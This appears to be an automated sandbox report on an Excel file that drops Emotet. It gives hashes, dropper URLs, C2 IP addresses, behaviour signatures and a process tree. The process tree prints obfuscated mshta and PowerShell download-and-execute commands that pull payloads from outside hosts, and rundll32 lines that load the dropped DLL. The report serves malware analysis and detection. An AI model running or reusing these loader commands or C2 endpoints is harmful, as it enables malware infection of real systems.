Analysis

  • max time kernel
    120s
  • max time network
    142s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    19-01-2022 12:20

General

  • Target

    a1d4e9c497ec94e9c1182741b7096c47396c0057014747c17e618e82538eae72.xls

  • Size

    142KB

  • MD5

    93de92f3e2868b196ea53446264d69e9

  • SHA1

    5a222d7fc81852ec5fb1ca0abca5fb7810e97299

  • SHA256

    a1d4e9c497ec94e9c1182741b7096c47396c0057014747c17e618e82538eae72

  • SHA512

    e0e3a2ca736ff74a5d756867a8c0418415a0f74fbb134ff09da468fe20a11c105ad9a230b8b05b9b3b45967f5afaedf1243f1f451c078bdc96d04adca7cc994e

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fer.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fer.png

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\a1d4e9c497ec94e9c1182741b7096c47396c0057014747c17e618e82538eae72.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3500
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2992
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:4892
        • C:\Windows\system32\mshta.exe
          mshta http://0xb907d607/fer/fer.html
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:972
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 972 -s 1648
            4⤵
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4268
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fer.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4276
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1728
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2968
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:1904
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Utgigcafuvtbl\ifoulwrkfb.psz",NlEP
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2904
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Utgigcafuvtbl\ifoulwrkfb.psz",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2876

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\ssd.dll
      MD5

      25ea220fe13b6f43220c311f855b7abc

      SHA1

      526520b3271281252945a4983aba9765fa408f90

      SHA256

      b43b8daf67688d0a65db8bfab54b9fe27ca5af7dc371826f77686d1828bbfdaf

      SHA512

      0be37eba47f91456f10a362c99a01888448a114f7cc9b5718546490d3e7dee200208761882ac90052c2cc6d8e03af38145481d03c6eced75477e393e21d0cb95

    • \Users\Public\Documents\ssd.dll
      MD5

      25ea220fe13b6f43220c311f855b7abc

      SHA1

      526520b3271281252945a4983aba9765fa408f90

      SHA256

      b43b8daf67688d0a65db8bfab54b9fe27ca5af7dc371826f77686d1828bbfdaf

      SHA512

      0be37eba47f91456f10a362c99a01888448a114f7cc9b5718546490d3e7dee200208761882ac90052c2cc6d8e03af38145481d03c6eced75477e393e21d0cb95

    • \Users\Public\Documents\ssd.dll
      MD5

      25ea220fe13b6f43220c311f855b7abc

      SHA1

      526520b3271281252945a4983aba9765fa408f90

      SHA256

      b43b8daf67688d0a65db8bfab54b9fe27ca5af7dc371826f77686d1828bbfdaf

      SHA512

      0be37eba47f91456f10a362c99a01888448a114f7cc9b5718546490d3e7dee200208761882ac90052c2cc6d8e03af38145481d03c6eced75477e393e21d0cb95

    • memory/1904-350-0x0000000004D40000-0x0000000004D66000-memory.dmp
      Filesize

      152KB

    • memory/1904-353-0x0000000004EA0000-0x0000000004EC6000-memory.dmp
      Filesize

      152KB

    • memory/1904-348-0x0000000004CE0000-0x0000000004D06000-memory.dmp
      Filesize

      152KB

    • memory/1904-346-0x0000000004B40000-0x0000000004B66000-memory.dmp
      Filesize

      152KB

    • memory/1904-344-0x0000000004A40000-0x0000000004A66000-memory.dmp
      Filesize

      152KB

    • memory/1904-341-0x0000000004440000-0x0000000004466000-memory.dmp
      Filesize

      152KB

    • memory/2876-358-0x0000000005270000-0x0000000005296000-memory.dmp
      Filesize

      152KB

    • memory/2876-355-0x0000000003490000-0x00000000034B6000-memory.dmp
      Filesize

      152KB

    • memory/2904-352-0x00000000040C0000-0x00000000040E6000-memory.dmp
      Filesize

      152KB

    • memory/2968-339-0x0000000004920000-0x0000000004946000-memory.dmp
      Filesize

      152KB

    • memory/3500-116-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp
      Filesize

      64KB

    • memory/3500-129-0x00007FFBCBCE0000-0x00007FFBCBCF0000-memory.dmp
      Filesize

      64KB

    • memory/3500-118-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp
      Filesize

      64KB

    • memory/3500-119-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp
      Filesize

      64KB

    • memory/3500-396-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp
      Filesize

      64KB

    • memory/3500-117-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp
      Filesize

      64KB

    • memory/3500-395-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp
      Filesize

      64KB

    • memory/3500-394-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp
      Filesize

      64KB

    • memory/3500-115-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp
      Filesize

      64KB

    • memory/3500-393-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp
      Filesize

      64KB

    • memory/3500-128-0x00007FFBCBCE0000-0x00007FFBCBCF0000-memory.dmp
      Filesize

      64KB

    • memory/4276-323-0x000002474EFC0000-0x000002474EFC2000-memory.dmp
      Filesize

      8KB

    • memory/4276-288-0x0000024736C50000-0x0000024736C72000-memory.dmp
      Filesize

      136KB

    • memory/4276-307-0x000002474EF50000-0x000002474EF8C000-memory.dmp
      Filesize

      240KB

    • memory/4276-318-0x000002474F580000-0x000002474F5F6000-memory.dmp
      Filesize

      472KB

    • memory/4276-324-0x000002474EFC3000-0x000002474EFC5000-memory.dmp
      Filesize

      8KB

    • memory/4276-325-0x000002474EFC6000-0x000002474EFC8000-memory.dmp
      Filesize

      8KB